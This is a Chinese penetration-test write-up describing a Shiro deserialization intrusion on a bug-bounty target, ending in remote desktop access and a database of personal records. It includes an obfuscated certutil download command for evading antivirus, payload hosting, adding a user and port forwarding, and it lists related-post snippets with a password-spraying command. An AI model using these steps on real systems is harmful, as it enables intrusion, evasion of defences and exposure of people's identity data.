记一次Shiro反序列化到远程桌面

VSole2022-01-19 07:26:49

首先在奇安信hunter上搜索找到该SRC的有关资产(具体我就不放了),然后通过微步来搜索子域名找到今天的测试站点。

然后利用xray中检测到该站点存在Shiro反序列化漏洞

于是考虑直接用feihong的反序列话工具,但是这次feihong的反序列化工具只检测出key,gatget没有检测出来,咨询了同事琛哥后,故考虑到是因为工具很久没更新,需要找一条CB的链,啪的一下回车

直接开冲,先看下系统中是否存在杀毒软件,一目了然,系统中存在火绒杀毒软件。

在确定了目标系统存在火绒后我第一时间尝试了hta上线,相关文章内容:记一次绕过火绒安全提权实战案例

不过很可惜这个方法我在本地多次尝试后发现火绒已经对这个方法进行了拦截和查杀。

后续和3h师傅交流应该是对文件的特征进行了查杀,不过也没有在深一步探索绕过的方法。

题外话:这里测试的时候有一个小坑,感觉是工具的问题,工具在执行需要大量回显的数据包时会卡死,需要重新启动工具再执行一次命令才行。

这里绕过火绒选择了certutil远程下载方式,常规的cerutil直接下载肯定是不行的,于是想到了以前群里有师傅发过的变形版的certutil绕过方式。在本地测试后发现火绒没有拦截该命令,此时激动的小手已经焦躁不安。

"c""e""r""t""u""t""i""l" -"u""r""l""c""a""c""h""e" -split -f https://url/1.exe 1.exe

题外话:发现目标系统不解析我vps的IP,搞得我晚上凌晨还在四处找人要VPS,感觉还是得随时准备一台国内的vps和国外的一台vps。

在找到vps后,先在工具上ping了一下vps的IP地址

可以解析到ip美滋滋,不过在下载之前还是最好看看目标服务器最近的登陆时间,以免被发现

直接开冲,首先在vps上启动一个临时的python web,命令如下。

python -m SimpleHTTPServer 8888


然后先在本地测试一下,看看可不可以下载下来,OK,没问题!

现在直接到工具中在目标系统上执行,成功落地到当前路径下。

执行dir命令查看是否成功下载到当前目录下

运行文件后上线

查看系统版本

因为是高版本所以获取不到明文信息


所以还有两个办法去远程连接, 一个是上传远控软件,另外一个就是直接添加用户。

先看第一个吧,使用截屏命令看看是否处于锁屏状态

由此可以判断当前机器应该是在锁屏中,所以这里只能我们自己添加一个用户上去。因为机器中存在火绒,所以还需要bypass火绒添加用户上去,方法我就暂时不放出来了(还请各位师傅见谅哈)

用户加入完成后就可以进行远程桌面连接了,这里为了避免机器告警,我们还需要把3389转发出来。

现在即可进行连接了

然后进来后翻到了一个配置文件,里面有数据库的信息

Mysql连接看看

随便看一个表,好家伙,身份证,生日,姓名等等个人信息全部都有,就先不深入了,等进一步授权再搞。

序列化vps
本作品采用《CC 协议》,转载必须注明作者和本文链接
打进内网以后的过程没有继续深入搞,具体原因大家懂的,前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户
首先在奇安信hunter上搜索找到该SRC的有关资产,然后通过微步来搜索子域名找到今天的测试站点
后续经过扫描探测发现T3、IIOP协议同时关闭了,仅限HTTP访问。需要用户名密码,打补丁后,可以判断用户名密码是否存在,但是无法上传文件成功。
记一次内网实战
2022-12-21 09:30:38
记一次内网实战
0x00 前言这次渗透测试是从一个CVE开始的,从CVE到内网然后到域控!首先对发现了该站点有JBoss页面,经过测试发现具有JBoss反序列化漏洞。使用网上提供的EXP和利用方法,在VPS上面获取了一个shell。
验证子域邮箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源渗透物理渗透、物理攻击、近源渗透,这几个的意思都是在接近目标进行安全测试。Wi-Fi网线没有终端准入控制,直接插网线 DHCP 获取 IP。Bad USBBlack Hat 上提出 Bad USB。社会工程学在信息收集过程中就开始。钓鱼本质是利用人的信任。Windows 主机FTP服务端开启 FTP 服务。使用 certutil 下载的文件会原封不动在?目录下保存一份,文件名位随机字符,使用 delete 可以删除刚下载的缓存。
Java RMI 利用入门学习
2021-09-19 14:04:35
Windows中遇到了Java RMI,反弹又不那么方便,这时该如何利用呢?It’s a question。正好加强Java学习了。
某次项目练手记录
2023-08-30 09:07:22
最近做了一个项目,复盘以后感觉大佬就是大佬,比不了比不了。
强网杯-WriteUp
2022-08-02 08:02:30
然后使用 admin/123登录管理员账户即可,登录后存在购买页面,经过测试,使用如下 payload 可以绕过检查,再访问主页面即可获得 flag
VSole
网络安全专家